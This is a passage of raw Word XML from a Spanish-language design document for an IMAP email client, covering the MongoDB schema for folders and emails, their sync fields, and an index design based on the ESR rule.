      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  syncedAt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha de creación del registro */</w:t>
      </w:r>
      <w:r>
        <w:br/>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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha de última modificación */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  updatedAt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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los campos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uidValidity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uidNext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">son fundamentales para detectar condiciones de sincronización: si el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uidValidity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del servidor difiere del almacenado, todos los UIDs locales son inválidos y se requiere una sincronización completa. El campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unseenMessages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se mantiene actualizado tanto por sincronización incremental como por notificaciones IDLE en tiempo real, permitiendo que el badge de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no leídos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en el sidebar se actualice sin recargar la página</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[39]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Índices:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{accountId: 1, sortOrder: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para listar carpetas ordenadas por usuario.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{accountId: 1, specialUse: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— unique sparse, una carpeta especial por tipo por cuenta.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="81"/>
    <w:bookmarkStart w:id="82" w:name="colección-emails-cache-headers-preview"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 Colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Cache Headers + Preview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es el núcleo del sistema: almacena los headers, preview y metadata de cada mensaje, actuando como índice local que permite listar y buscar emails sin consultar el servidor IMAP. Los cuerpos completos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se almacenan aquí; se obtienen bajo demanda vía IMAP y se cachean en Redis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[70]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[75]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> IEmail {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  _id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Referencia a la cuenta */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Referencia a la carpeta */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  folderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** UID IMAP del mensaje (único dentro de la carpeta) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  uid</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Message-ID del RFC 822 (usado para threading) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  messageId</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Message-ID al que responde (para construir threads) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  inReplyTo</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Array de Message-IDs referenciados (algoritmo JWZ) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[56]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  references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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** ID del thread (hash del Message-ID raíz, calculado por JWZ) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  threadId</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Remitente parseado */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  from</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address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Destinatarios principales */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  to</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address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Destinatarios en copia */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  cc</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address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Destinatarios en copia oculta (solo disponible para mensajes enviados) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  bcc</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address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Asunto del mensaje (decodificado RFC 2047) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  subject</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Fecha del mensaje (desde header Date) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha de recepción en el servidor IMAP */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  internalDate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Tamaño total del mensaje en bytes */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  size</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Preview de texto (primeros 200 caracteres del body plain) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  preview</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Flags IMAP del mensaje */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    seen</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\\Seen</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    answered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\\Answered</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    flagged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\\Flagged</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    deleted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\\Deleted</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    draft</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\\Draft</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Keywords personalizadas (Gmail labels, flags de usuario) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  keywords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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si tiene adjuntos */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  hasAttachments</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Número de adjuntos */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  attachmentCount</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Modsequence para sync CONDSTORE */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  modseq</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si el body ya fue cacheado en Redis */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  bodyCached</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha de cacheo del body */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  bodyCachedAt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Timestamp de creación del registro */</w:t>
      </w:r>
      <w:r>
        <w:br/>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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Timestamp de última modificación */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  updatedAt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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El diseño del índice compuesto principal sigue estrictamente la regla ESR (Equality → Sort → Range): los campos de igualdad (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">folderId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) preceden al campo de ordenamiento (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">date: -1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), que a su vez precede al campo de rango (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[204]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Esta estructura garantiza que la query más frecuente del sistema —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dame los emails de esta carpeta ordenados por fecha descendente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— se resuelva con un index scan monodireccional sin necesidad de in-memory sort ni fetch de documentos adicionales.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1630"/>
        <w:gridCol w:w="1397"/>
        <w:gridCol w:w="1863"/>
        <w:gridCol w:w="3028"/>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Índice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ObjectId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Primary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Identificador único</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">accountId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ObjectId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compound (ESR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FK a accounts._id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">folderId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ObjectId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compound (ESR)</w:t>
